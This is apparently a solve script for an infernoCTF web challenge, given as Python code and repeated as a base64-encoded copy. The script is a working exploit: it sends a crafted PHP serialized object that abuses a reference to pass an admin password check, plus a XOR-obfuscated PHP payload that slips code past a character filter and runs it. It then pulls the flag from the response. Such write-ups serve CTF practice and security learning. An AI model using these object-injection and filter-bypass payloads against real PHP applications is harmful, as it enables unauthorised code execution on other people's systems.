#!/usr/bin/python3
from requests import get
from bs4 import BeautifulSoup as BS
from re import search
host = "http://104.197.168.32:17010/"
flag = "infernoCTF{.*?}"
def make_letters(result):
chars = [ord(c) for c in "!@$%^&*()_-+={}[]:/?|.>,<"]
result = [ord(c) for c in result]
c1s = []
c2s = []
for r in result:
found = False
for c1 in chars:
for c2 in chars:
if c1 ^ c2 == r:
c1s.append(chr(c1))
c2s.append(chr(c2))
found = True
break
if found:
break
return "\"{}\"^\"{}\"".format(''.join(c1s), ''.join(c2s))
def main():
global flag
caption = "$_=" + make_letters("echoFlag") + ";$_();"
data = {
"id": 'O:4:"user":3:{s:4:"name";s:5:"admin";s:4:"pass";N;s:6:"secret";R:3;}',
"caption": caption
}
response = get(host, params=data)
soup = BS(response.content, "lxml")
flag = search(flag, soup.text).group()
print(flag)
if __name__ == "__main__":
main()
IyEvdXNyL2Jpbi9weXRob24zCgpmcm9tIHJlcXVlc3RzIGltcG9ydCBnZXQKZnJvbSBiczQgaW1wb3J0IEJlYXV0aWZ1bFNvdXAgYXMgQlMKZnJvbSByZSBpbXBvcnQgc2VhcmNoCgpob3N0ID0gImh0dHA6Ly8xMDQuMTk3LjE2OC4zMjoxNzAxMC8iCmZsYWcgPSAiaW5mZXJub0NURnsuKj99IgoKZGVmIG1ha2VfbGV0dGVycyhyZXN1bHQpOgogICAgY2hhcnMgPSBbb3JkKGMpIGZvciBjIGluICIhQCQlXiYqKClfLSs9e31bXTovP3wuPiw8Il0KICAgIHJlc3VsdCA9IFtvcmQoYykgZm9yIGMgaW4gcmVzdWx0XQogICAgYzFzID0gW10KICAgIGMycyA9IFtdCgogICAgZm9yIHIgaW4gcmVzdWx0OgogICAgICAgIGZvdW5kID0gRmFsc2UKCiAgICAgICAgZm9yIGMxIGluIGNoYXJzOgogICAgICAgICAgICBmb3IgYzIgaW4gY2hhcnM6CiAgICAgICAgICAgICAgICBpZiBjMSBeIGMyID09IHI6CiAgICAgICAgICAgICAgICAgICAgYzFzLmFwcGVuZChjaHIoYzEpKQogICAgICAgICAgICAgICAgICAgIGMycy5hcHBlbmQoY2hyKGMyKSkKICAgICAgICAgICAgICAgICAgICBmb3VuZCA9IFRydWUKICAgICAgICAgICAgICAgICAgICBicmVhawoKICAgICAgICAgICAgaWYgZm91bmQ6CiAgICAgICAgICAgICAgICBicmVhawoKICAgIHJldHVybiAiXCJ7fVwiXlwie31cIiIuZm9ybWF0KCcnLmpvaW4oYzFzKSwgJycuam9pbihjMnMpKQoKZGVmIG1haW4oKToKICAgIGdsb2JhbCBmbGFnCgogICAgY2FwdGlvbiA9ICIkXz0iICsgbWFrZV9sZXR0ZXJzKCJlY2hvRmxhZyIpICsgIjskXygpOyIKICAgIGRhdGEgPSB7CiAgICAgICAgImlkIjogJ086NDoidXNlciI6Mzp7czo0OiJuYW1lIjtzOjU6ImFkbWluIjtzOjQ6InBhc3MiO047czo2OiJzZWNyZXQiO1I6Mzt9JywKICAgICAgICAiY2FwdGlvbiI6IGNhcHRpb24KICAgIH0KCiAgICByZXNwb25zZSA9IGdldChob3N0LCBwYXJhbXM9ZGF0YSkKICAgIHNvdXAgPSBCUyhyZXNwb25zZS5jb250ZW50LCAibHhtbCIpCiAgICBmbGFnID0gc2VhcmNoKGZsYWcsIHNvdXAudGV4dCkuZ3JvdXAoKQogICAgcHJpbnQoZmxhZykKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKCk=